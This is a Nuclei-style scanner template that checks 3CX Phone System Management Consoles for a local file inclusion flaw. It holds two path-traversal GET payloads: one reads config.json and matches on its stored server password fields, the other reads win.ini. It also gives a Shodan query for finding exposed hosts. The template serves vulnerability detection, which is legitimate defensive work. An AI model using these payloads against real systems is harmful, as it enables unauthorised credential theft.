id: 3cx-management-console

info:
  name: 3CX Management Console - Local File Inclusion
  author: random-robbie
  severity: high
  description: 3CX Management Console is vulnerable to local file inclusion.
  reference:
    - https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 2
    shodan-query: http.title:"3CX Phone System Management Console"
  tags: 3cx,lfi,voip

http:
  - method: GET
    path:
      - '{{BaseURL}}/Electron/download/windows/..\..\..\Http\webroot\config.json'
      - '{{BaseURL}}/Electron/download/windows/\windows\win.ini'

    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "CfgServerPassword"
          - "CfgServerAppName"
        condition: and

      - type: word
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

# digest: 490a00463044022024041946d635a84a40ec7d965323005359f645b2ef2e8a63879f2d67a720f42802207afecf87f277632605890f2e2c0ed3cf69b8c01e3368d1b01d9bc6df00126052:922c64590222798bb761d5b6d8e72950
